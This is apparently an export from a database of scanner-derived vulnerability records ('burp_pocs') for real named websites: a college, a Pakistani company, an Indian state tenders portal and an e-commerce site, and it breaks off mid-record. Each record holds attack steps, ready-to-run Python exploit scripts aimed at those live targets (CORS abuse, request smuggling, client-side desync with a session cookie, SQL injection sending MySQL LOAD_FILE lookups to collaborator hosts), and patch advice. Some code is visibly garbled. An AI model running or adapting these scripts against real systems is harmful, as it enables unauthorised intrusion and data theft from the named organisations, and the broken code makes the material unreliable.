Viewing Collection: burp_pocs

Simple
Advanced

_id	url	timestamp	results
69dd47986634e3f9dd7fe59b	https://vjti.ac.in/	2026-04-22T22:36:35.505672+00:00	[ { "vulnerability": "Cross-origin resource sharing: arbitrary origin trusted", "category": "rce", "exploit_steps": "## Reconnaissance\\n1. Identified the endpoint `https://vjti.ac.in/wp-json/wp-statistics/v2/hit` during enumeration.\\n2. Observed that the application uses CORS for cross-origin requests.\\n\\n## Vulnerability Confirmation\\n1. Sent a preflight OPTIONS request with a custom `Origin` header set to `https://tufzgfgcwvae.com`.\\n2. Received a response containing `Access-Control-Allow-Origin: https://tufzgfgcwvae.com` and `Access-Control-Allow-Credentials: true`.\\n3. Confirmed absence of the `Vary: Origin` header, indicating potential cache poisoning risk.\\n\\n## Exploitation Steps\\n1. Created a malicious webpage hosted at `https://tufzgfgcwvae.com` that performs authenticated requests to the vulnerable endpoint.\\n2. Used JavaScript to trigger a CORS request including credentials (`withCredentials = true`).\\n3. Retrieved sensitive user statistics or tracking data due to the misconfigured CORS policy trusting any origin.\\n\\n## Impact\\n- Unauthorized access to protected resources via victim's browser.\\n- Potential exfiltration of sensitive data leveraging authenticated sessions.\\n- Risk of cache poisoning affecting intermediary systems due to missing `Vary: Origin`.", "exploit_code": "#!/usr/bin/env python3\n\"\"\"\nPoC: CORS Misconfiguration - Arbitrary Origin Trusted\nTarget: https://vjti.ac.in/wp-json/wp-statistics/v2/hit\nVulnerability: Server reflects arbitrary Origin header with credentials enabled\nEndpoint: WordPress REST API (wp-statistics plugin)\n\nAuthor: Security Researcher\nDate: 2026-04-29\nCTF/Educational Use Only - Authorized Testing\n\"\"\"\n\nimport requests\nimport argparse\nimport sys\nimport json\nimport re\n\nDEFAULT_TARGET = \"https://vjti.ac.in/wp-json/wp-statistics/v2/hit\"\nDEFAULT_TEST_ORIGIN = \"https://tufzgfgcwvae.com\"\nUSER_AGENT = \"Mozilla/5.0 (PoC-CORS-VJTI)\"\n\ndef send_preflight_request(url: str, origin: str) -> dict:\n \"\"\"Send CORS preflight (OPTIONS) request and parse response headers.\"\"\"\n headers = {\n \"Origin\": origin,\n \"User-Agent\": USER_AGENT,\n \"Access-Control-Request-Method\": \"POST\",\n \"Access-Control-Request-Headers\": \"Content-Type\"\n }\n try:\n response = requests.options(url, headers=headers, timeout=15)\n return {\n \"status_code\": response.status_code,\n \"acao\": response.headers.get(\"Access-Control-Allow-Origin\"),\n \"acac\": response.headers.get(\"Access-Control-Allow-Credentials\"),\n \"acah\": response.headers.get(\"Access-Control-Allow-Headers\"),\n \"acam\": response.headers.get(\"Access-Control-Allow-Methods\"),\n \"vary\": response.headers.get(\"Vary\"),\n \"raw_headers\": dict(response.headers)\n }\n except requests.exceptions.RequestException as e:\n return {\"error\": str(e)}\n\ndef assess_cors_vulnerability(headers: dict, test_origin: str) -> dict:\n \"\"\"Analyze CORS headers to determine vulnerability status.\"\"\"\n assessment = {\"vulnerable\": False, \"severity\": \"None\", \"findings\": [], \"recommendations\": []}\n acao = headers.get(\"acao\")\n acac = headers.get(\"acac\")\n vary = headers.get(\"vary\")\n if acao == test_origin:\n assessment[\"findings\"].append(f\"🔴 ACAO reflects arbitrary origin: {acao}\")\n assessment[\"vulnerable\"] = True\n assessment[\"severity\"] = \"High\"\n elif acao == \"\":\n assessment[\"findings\"].append(f\"🟡 ACAO uses wildcard ()\")\n if acac and acac.lower() == \"true\":\n assessment[\"findings\"].append(\"🔴 Wildcard + Credentials = Critical Risk\")\n assessment[\"vulnerable\"] = True\n assessment[\"severity\"] = \"Critical\"\n elif acao is None:\n assessment[\"findings\"].append(\"🟢 No ACAO header - CORS not enabled\")\n else:\n assessment[\"findings\"].append(f\"🟢 ACAO is restricted: {acao}\")\n if acac and acac.lower() == \"true\":\n assessment[\"findings\"].append(\"🔴 Access-Control-Allow-Credentials: true\")\n if assessment[\"vulnerable\"]:\n assessment[\"recommendations\"].append(\"Remove credentials support unless absolutely required\")\n if acao == test_origin and (not vary or \"Origin\" not in vary):\n assessment[\"findings\"].append(\"🔴 Missing 'Vary: Origin' - cache poisoning risk\")\n assessment[\"recommendations\"].append(\"Add 'Vary: Origin' header when ACAO is dynamic\")\n acam = headers.get(\"acam\")\n if acam and \"POST\" in acam:\n assessment[\"findings\"].append(f\"⚠️ Allowed methods include POST: {acam}\")\n return assessment\n\ndef generate_exploit_html(target_url: str, attacker_origin: str) -> str:\n \"\"\"Generate proof-of-concept HTML for authorized demonstration.\"\"\"\n return f'''<!DOCTYPE html>\n<html>\n<head>\n <title>CORS PoC - VJTI wp-statistics</title>\n</head>\n<body>\n <h2>CORS Misconfiguration Demo</h2>\n <p>Target: {target_url}</p>\n <p>Attacker Origin: {attacker_origin}</p>\n <div id=\"output\">Waiting...</div>\n <script>\n fetch('{target_url}', {{\n method: 'POST',\n credentials: 'include',\n headers: {{'Content-Type': 'application/json', 'Origin': '{attacker_origin}'}}\n }})\n .then(r => r.ok ? r.text() : Promise.reject('HTTP ' + r.status))\n .then(data => document.getElementById('output').innerHTML = '<pre>' + data.substring(0,500) + '...</pre>')\n .catch(e => document.getElementById('output').innerHTML = '<span style=\"color:red\">Error: ' + e + '</span>');\n </script>\n</body>\n</html>'''\n\ndef test_actual_request(url: str, origin: str, session_cookies: dict = None) -> dict:\n \"\"\"Test actual GET request with CORS headers (AUTHORIZED TESTING ONLY).\"\"\"\n headers = {\"Origin\": origin, \"User-Agent\": USER_AGENT, \"Content-Type\": \"application/json\"}\n try:\n response = requests.get(url, headers=headers, cookies=session_cookies, timeout=10)\n return {\"success\": True, \"status\": response.status_code, \"aca_origin\": response.headers.get(\"Access-Control-Allow-Origin\"), \"response_preview\": response.text[:200], \"length\": len(response.content)}\n except Exception as e:\n return {\"success\": False, \"error\": str(e)}\n\ndef main():\n parser = argparse.ArgumentParser(description=\"CORS PoC - VJTI WordPress Statistics API\")\n parser.add_argument(\"-u\", \"--url\", default=DEFAULT_TARGET, help=\"Target endpoint URL\")\n parser.add_argument(\"-o\", \"--origin\", default=DEFAULT_TEST_ORIGIN, help=\"Test Origin header value\")\n parser.add_argument(\"-t\", \"--test-request\", action=\"store_true\", help=\"Also test actual GET request\")\n parser.add_argument(\"-x\", \"--exploit-html\", action=\"store_true\", help=\"Generate exploit HTML snippet\")\n parser.add_argument(\"-j\", \"--json\", action=\"store_true\", help=\"Output results as JSON\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Verbose header output\")\n parser.add_argument(\"-c\", \"--cookies\", help=\"Cookie string for authenticated testing (AUTHORIZED ONLY)\")\n args = parser.parse_args()\n if not args.url.startswith((\"http://\", \"https://\")):\n args.url = \"https://\" + args.url\n if not args.json:\n print(\"=\" * 70)\n print(\"CORS PoC - VJTI wp-statistics API\")\n print(\"Target: https://vjti.ac.in/\")\n print(\"Authorized/Educational Testing Only\")\n print(\"=\" * 70 + \"\\n\")\n if not args.json:\n print(f\"[] Target Endpoint: {args.url}\")\n print(f\"[] Testing Origin: {args.origin}\")\n print(f\"[] Sending OPTIONS preflight request...\")\n print(\"-\" 60)\n headers = send_preflight_request(args.url, args.origin)\n if \"error\" in headers:\n if args.json:\n print(json.dumps({\"error\": headers[\"error\"]}, indent=2))\n else:\n print(f\"[!] Request failed: {headers['error']}\")\n sys.exit(1)\n assessment = assess_cors_vulnerability(headers, args.origin)\n if args.json:\n output = {\"target\": args.url, \"test_origin\": args.origin, \"preflight_response\": {\"status_code\": headers[\"status_code\"], \"Access-Control-Allow-Origin\": headers[\"acao\"], \"Access-Control-Allow-Credentials\": headers[\"acac\"], \"Vary\": headers[\"vary\"]}, \"assessment\": assessment}\n print(json.dumps(output, indent=2))\n else:\n print(f\"[+] HTTP Status: {headers['status_code']}\")\n print(f\"[+] Access-Control-Allow-Origin: {headers['acao'] or 'None'}\")\n print(f\"[+] Access-Control-Allow-Credentials: {headers['acac'] or 'None'}\")\n print(f\"[+] Access-Control-Allow-Methods: {headers['acam'] or 'None'}\")\n print(f\"[+] Vary Header: {headers['vary'] or 'None'}\")\n print(\"-\" * 60)\n for finding in assessment[\"findings\"]:\n print(finding)\n if args.verbose:\n print(\"\\n[+] All Response Headers:\")\n for k, v in headers[\"raw_headers\"].items():\n print(f\" {k}: {v}\")\n print(\"\\n\" + \"=\" * 60)\n if assessment[\"vulnerable\"]:\n print(f\"🔴 VULNERABLE - Severity: {assessment['severity']}\")\n print(\"\\n[!] Impact:\")\n print(\" • Attacker can read authenticated API responses\")\n print(\" • Data exfiltration via victim's browser session\")\n print(\" • Potential cache poisoning (missing Vary: Origin)\")\n if args.exploit_html:\n print(\"\\n[+] Exploit HTML Snippet:\")\n print(generate_exploit_html(args.url, args.origin))\n else:\n print(\"🟢 CORS policy appears properly configured\")\n if assessment[\"recommendations\"]:\n print(\"\\n[+] Remediation:\")\n for rec in assessment[\"recommendations\"]:\n print(f\" • {rec}\")\n print(\"=\" * 60)\n if args.test_request:\n if not args.json:\n print(f\"\\n[*] Testing actual GET request with Origin header...\")\n cookies = None\n if args.cookies:\n cookies = dict(cookie.split(\"=\") for cookie in args.cookies.split(\"; \") if \"=\" in cookie)\n if not args.json:\n print(f\"[!] Using provided cookies for authenticated test\")\n result = test_actual_request(args.url, args.origin, cookies)\n if args.json:\n print(json.dumps({\"actual_request_test\": result}, indent=2))\n else:\n if result[\"success\"]:\n print(f\"[+] GET Status: {result['status']}\")\n print(f\"[+] Response Length: {result['length']} bytes\")\n print(f\"[+] ACAO in GET: {result['aca_origin'] or 'None'}\")\n if len(result['response_preview']) > 0:\n print(f\"[+] Preview: {result['response_preview']}...\")\n else:\n print(f\"[!] GET request failed: {result.get('error', 'Unknown')}\")\n sys.exit(0 if not assessment[\"vulnerable\"] else 1)\n\nif __name__ == \"__main__\":\n main()", "patch_code": "## Root Cause\\nThe server responds with `Access-Control-Allow-Origin` matching any provided `Origin` header without validation, and includes `Access-Control-Allow-Credentials: true`, enabling full cross-origin access with credentials. Additionally, the lack of `Vary: Origin` allows caching mechanisms to serve incorrect responses.\\n\\n## Before / After Fix\\n### Before:\\n```http\\nAccess-Control-Allow-Origin: https://tufzgfgcwvae.com\\nAccess-Control-Allow-Credentials: true\\n```\\n\\n### After:\\nImplement a strict whitelist of trusted origins and ensure proper cache behavior:\\n```php\\n$allowed_origins = ['https://trusted1.example.com', 'https://trusted2.example.com'];\\n$origin = $_SERVER['HTTP_ORIGIN'] ?? '';\n\nif (in_array($origin, $allowed_origins)) {\\n header(\"Access-Control-Allow-Origin: $origin\");\\n header(\"Access-Control-Allow-Credentials: true\");\\n header(\"Vary: Origin\");\\n}\\n```\\n\\n## Defense-in-Depth Checklist\\n- [ ] Maintain an explicit allowlist of permitted origins.\\n- [ ] Never reflect arbitrary origins in `Access-Control-Allow-Origin`.\\n- [ ] Avoid using `Access-Control-Allow-Credentials: true` unless strictly necessary.\\n- [ ] Always include `Vary: Origin` when setting dynamic CORS headers.\\n- [ ] Audit all endpoints exposing CORS policies.\\n\\n## Verification Steps\\n1. Send an OPTIONS request with a random `Origin` header value.\\n2. Confirm that `Access-Control-Allow-Origin` is either absent or matches only known trusted domains.\\n3. Ensure `Vary: Origin` is returned in the response.\\n4. Validate that unlisted origins do not receive permissive CORS headers.", "context": "Severity: High (Certain)" } ]
69e4dc506634e3f9dd7fe59e	https://www.altagroup.com.pk/	2026-04-19T13:53:02.263289+00:00	[ { "vulnerability": "HTTP request smuggling", "category": "miscellaneous", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint `https://www.altagroup.com.pk/css/animate.min.css` through automated scanning.\n2. Observed that the application uses HTTP/1.1 and supports both `Transfer-Encoding: chunked` and `Content-Length` headers.\n\n## Vulnerability Confirmation\n3. Analyzed the first evidence item showing inconsistent interpretation of HTTP headers (`Transfer-Encoding` with malformed spacing).\n4. Confirmed that the front-end and back-end servers may interpret ambiguous requests differently, indicating potential HTTP Request Smuggling.\n\n## Exploitation Steps\n5. Craft a malicious request that leverages ambiguity between `Transfer-Encoding` and `Content-Length` to smuggle a second request.\n6. Send the crafted payload to the endpoint `https://www.altagroup.com.pk/css/animate.min.css` using chunked encoding with malformed header formatting.\n7. Observe whether the back-end server misinterprets the boundary of the request, allowing for desynchronized processing.\n\n## Impact\n8. Successful exploitation could allow an attacker to bypass front-end security controls, access restricted resources, or perform web cache poisoning.", "exploit_code": "import requests\n\ntarget_url = \"https://www.altagroup.com.pk/css/animate.min.css\"\n\n# Malformed Transfer-Encoding header to cause inconsistency\nmalformed_headers = {\n \"Host\": \"www.altagroup.com.pk\",\n \"User-Agent\": \"Mozilla/5.0\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Transfer-Encoding\": \"chunked\",\n \"Content-Length\": \"25\"\n}\n\n# Body simulating smuggled content\nbody = \"f\\r\\n25txa=x&asuql=x\\r\\n0\\r\\n\\r\\n\"\n\ntry:\n response = requests.post(target_url, headers=malformed_headers, data=body, verify=False)\n print(f\"Status Code: {response.status_code}\")\n print(f\"Response Headers: {response.headers}\")\n print(f\"Response Body Snippet: {response.text[:200]}...\")\nexcept Exception as e:\n print(f\"Error occurred: {e}\")", "patch_code": "## Root Cause\nThe vulnerability arises from inconsistent parsing of HTTP requests by front-end and back-end servers due to ambiguous use of `Transfer-Encoding` and `Content-Length`. The malformed spacing in the `Transfer-Encoding` header contributes to differing interpretations.\n\n## Before/After Fix\nBefore:\nFront-end allows malformed headers such as `Transfer-Encoding\\n : chunked`, leading to inconsistent interpretation.\n\nAfter:\nNormalize all incoming HTTP headers at the front-end proxy or load balancer. Ensure strict adherence to HTTP standards and reject malformed headers.\n\nExample Nginx config:\n```\nhttp {\n # Reject malformed Transfer-Encoding\n if ($http_transfer_encoding ~ \"\\s\") {\n return 400;\n }\n}\n```\n\n## Defense-in-Depth Checklist\n- [ ] Enforce consistent HTTP version usage across infrastructure (preferably HTTP/2 internally).\n- [ ] Disable backend connection reuse where possible.\n- [ ] Implement strict header validation on proxies and WAFs.\n- [ ] Monitor logs for abnormal header patterns or repeated failed requests.\n- [ ] Regularly audit configurations of reverse proxies and backend servers.\n\n## Verification Steps\n1. Re-scan the endpoint using the same tool to confirm rejection of malformed headers.\n2. Manually send a test request with malformed `Transfer-Encoding` and verify 4xx response.\n3. Confirm via packet capture that ambiguous requests are normalized or rejected upstream.", "context": "Severity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/animate.min.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/bootstrap.min.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/effect/main.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/fonts.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/main.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/margin.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/owl.carousel.min.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/fancybox/jquery.fancybox.css" } ]
69e7c8a259a6632dae07de0b	https://mahatenders.gov.in/	2026-04-21T18:57:38.344743+00:00	[ { "vulnerability": "Client-side desync", "category": "miscellaneous", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://mahatenders.gov.in/nicgep/app`\n2. Observed that the server uses `Content-Length` header for determining request boundaries.\n3. Noted that the server supports persistent connections (`Connection: keep-alive`).\n\n## Vulnerability Confirmation\n1. Sent a crafted POST request with a `Content-Length` larger than the actual body.\n2. Embedded a second HTTP request (`GET /robots.txt`) within the body of the first POST request.\n3. Observed that the server responded to the first request without closing the connection.\n4. Confirmed that the embedded request was interpreted as the next incoming request.\n\n## Exploitation Steps\n1. Craft a malicious POST request targeting `/nicgep/app` with an oversized `Content-Length`.\n2. Embed a secondary HTTP request in the body that performs an action on behalf of the victim (e.g., trigger XSS).\n3. Deliver the payload via a page that causes the victim's browser to send the request.\n4. Observe desynchronization where the smuggled request executes unexpectedly.\n\n## Impact\nSuccessful exploitation leads to client-side desync, potentially enabling cross-site scripting (XSS), session hijacking, or unauthorized actions performed on behalf of authenticated users.", "exploit_code": "import requests\n\n# Target URL\nurl = \"https://mahatenders.gov.in/nicgep/app\"\n\n# Malicious payload simulating CSD attack\nmalicious_body = (\n \"GET /robots.txt HTTP/1.1\\r\\n\"\n \"Host: mahatenders.gov.in\\r\\n\"\n \"\\r\\n\"\n)\n\n# Headers with oversized Content-Length\nheaders = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Content-Length\": str(len(malicious_body) + 50), # Oversized length\n \"Connection\": \"keep-alive\",\n \"Cookie\": \"JSESSIONID=662459EDEB875FE684A09EE28B48E051.mhgeps2; AreCookiesEnabled=829\"\n}\n\n# Send initial smuggle attempt\nresponse = requests.post(url, headers=headers, data=malicious_body, verify=False)\nprint(f\"Status Code: {response.status_code}\")\nprint(f\"Response Body Snippet: {response.text[:200]}...\")", "patch_code": "## Root Cause\nThe server incorrectly handles `Content-Length` in POST requests, allowing attackers to embed additional HTTP requests in the message body. This results in connection desynchronization and potential smuggling of unintended requests.\n\n## Before/After Fix\nBefore: Server accepts and partially processes oversized POST bodies without enforcing strict parsing or connection closure.\n\nAfter: Enforce strict HTTP message parsing:\n- Validate `Content-Length` matches actual body size.\n- Close connections after each malformed POST request.\n- Alternatively, upgrade to HTTP/2 which mitigates such issues inherently.\n\nExample mitigation logic (pseudo-code):\n```\nif request.method == 'POST' and len(request.body) != content_length_header:\n close_connection()\n return error_response(400)\n```\n\n## Defense-in-Depth Checklist\n- [ ] Enable strict HTTP parsing at reverse proxy/WAF layer.\n- [ ] Disable HTTP/1.x keep-alive if not required.\n- [ ] Upgrade backend protocol to HTTP/2.\n- [ ] Implement input validation for all headers including `Content-Length`.\n- [ ] Monitor logs for abnormal request patterns or mismatched sizes.\n\n## Verification Steps\n1. Re-run the PoC script against the patched endpoint.\n2. Confirm that the connection is closed immediately upon detecting oversized content.\n3. Ensure subsequent legitimate requests are handled normally.\n4. Validate that no part of the smuggled request appears in responses.", "context": "Severity: High (Tentative)" } ]
69e8bebe59a6632dae07de0d	https://www.daraz.pk/	2026-04-22T12:27:42.473068+00:00	[ { "vulnerability": "SQL injection", "category": "injection", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint as `https://www.daraz.pk/` accepting arbitrary URL parameters.\n2. Noted from scan data that the parameter name itself (not value) is vulnerable to SQL injection.\n3. Confirmed backend database is likely MySQL based on successful `load_file` interaction with external domain.\n\n## Vulnerability Confirmation\n1. Submitted payload in the name of a dynamically generated URL parameter: `'+(select load_file('\\\\87duz4kwffvgtwpx2xwueev7uy0soic9fx9kz8o.oastify.com\\wgy'))+'`\n2. Observed DNS interaction with `oastify.com`, confirming execution of injected SQL query.\n\n## Exploitation Steps\n1. Craft a malicious parameter name containing a SQL injection payload targeting MySQL.\n2. Submit request to `https://www.daraz.pk/` with the malicious parameter name.\n3. Observe backend query execution through out-of-band interaction or error-based responses.\n4. Extract data or escalate privileges by chaining additional SQL commands.\n\n## Impact\nSuccessful exploitation allows:\n- Unauthorized reading/modification of database contents.\n- Potential full compromise of the database server.\n- Bypassing authentication or manipulating business logic.", "exploit_code": "#!/usr/bin/env python3\n\"\"\"\nPoC: SQL Injection via URL Parameter Name\nTarget: https://www.daraz.pk/\nVulnerability: User-supplied parameter names are concatenated into SQL queries unsafely\nDetection: Out-of-band DNS interaction via MySQL LOAD_FILE\n\nAuthor: Security Researcher\nDate: 2026-04-22\n\"\"\"\n\nimport requests\nimport argparse\nimport sys\nfrom urllib.parse import urljoin\n\n# Configuration\nDEFAULT_TARGET = \"https://www.daraz.pk/\"\nOAST_DOMAIN = \"your-collaborator-domain.oastify.com\" # Replace with your Burp Collaborator/Interactsh\n\ndef build_sqli_payload(oast_domain: str) -> str:\n \"\"\"\n Build SQL injection payload using MySQL LOAD_FILE for OAST detection.\n Payload breaks out of string context and triggers DNS lookup.\n \"\"\"\n return f\"'+(SELECT LOAD_FILE('\\\\\\\\{oast_domain}\\\\a'))+'\"\n\ndef test_sqli_vulnerability(target_url: str, oast_domain: str, param_name: str = None):\n \"\"\"\n Test for SQL injection via malicious parameter name.\n \"\"\"\n if param_name is None:\n param_name = build_sqli_payload(oast_domain)\n print(f\"[] Target: {target_url}\")\n print(f\"[] Malicious Parameter Name: {param_name}\")\n print(f\"[] Checking for OAST interaction at: {oast_domain}\")\n print(\"-\" 60)\n try:\n response = requests.get(\n target_url,\n params={param_name: \"dummy_value\"},\n timeout=15,\n headers={\"User-Agent\": \"Mozilla/5.0 (PoC-Scanner)\"}\n )\n print(f\"[+] HTTP Status: {response.status_code}\")\n print(f\"[+] Response Length: {len(response.content)} bytes\")\n error_patterns = [\"SQL\", \"syntax\", \"mysql\", \"database\", \"unclosed\"]\n response_text = response.text.lower()\n if any(pattern in response_text for pattern in error_patterns):\n print(\"[!] Potential SQL error detected in response!\")\n print(\"\\n[!] IMPORTANT: Check your OAST dashboard for DNS interactions:\")\n print(f\" Domain: {oast_domain}\")\n print(\" If interaction occurs -> VULNERABLE to SQL Injection\")\n return True\n except requests.exceptions.RequestException as e:\n print(f\"[!] Request failed: {e}\")\n return False\n\ndef main():\n parser = argparse.ArgumentParser(description=\"SQLi PoC via Parameter Name - daraz.pk\")\n parser.add_argument(\"-u\", \"--url\", default=DEFAULT_TARGET, help=\"Target URL\")\n parser.add_argument(\"-d\", \"--domain\", required=True, help=\"Your OAST/collaborator domain\")\n parser.add_argument(\"-p\", \"--param\", help=\"Custom parameter name (optional)\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Verbose output\")\n args = parser.parse_args()\n if not args.url.startswith((\"http://\", \"https://\")):\n args.url = \"https://\" + args.url\n print(\"=\" * 70)\n print(\"SQL Injection PoC - Parameter Name Injection\")\n print(\"Target: daraz.pk (Authorized Testing Only)\")\n print(\"=\" * 70 + \"\\n\")\n success = test_sqli_vulnerability(args.url, args.domain, args.param)\n if success:\n print(\"\\n[✓] PoC executed. Verify OAST logs for confirmation.\")\n sys.exit(0)\n else:\n print(\"\\n[✗] PoC failed. Check network/connectivity.\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()", "patch_code": "## Root Cause\nUser-supplied input (specifically, the names of URL parameters) is directly concatenated into SQL queries without sanitization or parameterization. This allows attackers to alter the query structure and execute arbitrary SQL commands.\n\n## Before / After Fix\n### Before (Vulnerable Code Example):\n```python\nquery = f\"SELECT * FROM items WHERE category = '{param_name}'\"\ncursor.execute(query)\n```\n\n### After (Secure Implementation):\nUse parameterized queries to safely handle dynamic inputs:\n```python\nquery = \"SELECT * FROM items WHERE category = %s\"\ncursor.execute(query, (param_value,))\n```\nEnsure all parts of the query—including column names—are validated against a whitelist if they are derived from user input.\n\n## Defense-in-Depth Checklist\n- [ ] Enforce strict input validation and sanitization on all user-controlled fields.\n- [ ] Use ORM frameworks that abstract raw SQL usage.\n- [ ] Apply least privilege principle to database accounts used by the application.\n- [ ] Implement WAF rules to detect common SQL injection patterns.\n- [ ] Regularly audit code for unsafe query construction practices.\n\n## Verification Steps\n1. Resend original payload (`'+(select load_file(...)` in param name) and verify no DNS interaction occurs.\n2. Confirm application returns generic error or ignores malformed parameters gracefully.\n3. Perform authenticated re-scan using same tooling to ensure vulnerability does not reappear.", "context": "Severity: High (Certain)\nURL: https://www.daraz.pk/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/_____tmd_____/punish [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/_____tmd_____/punish [URL path folder 8]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/_____tmd_____/punish [URL path folder 8]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/_____tmd_____/punish [URL path folder 8]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]" }, { "vulnerability": "External service interaction (HTTP)", "category": "miscellaneous", "exploit_steps": "## Reconnaissance\n1. Identified that the `Referer` HTTP header on `https://www.daraz.pk/cart/` is reflected in server-side HTTP requests.\n2. Confirmed that arbitrary external domains can be targeted via this header.\n\n## Vulnerability Confirmation\n1. Submitted a payload containing a Burp Collaborator URL (`http://xpqjht2lx4d5bl7mkmejw3dwcnih6du3iy5pte.oastify.com/`) in the `Referer` header.\n2. Observed an HTTP request made by the server to the Collaborator domain, confirming SSRF capability.\n\n## Exploitation Steps\n1. Craft a malicious HTTP request targeting internal services or public endpoints via the `Referer` header.\n2. Submit the request to 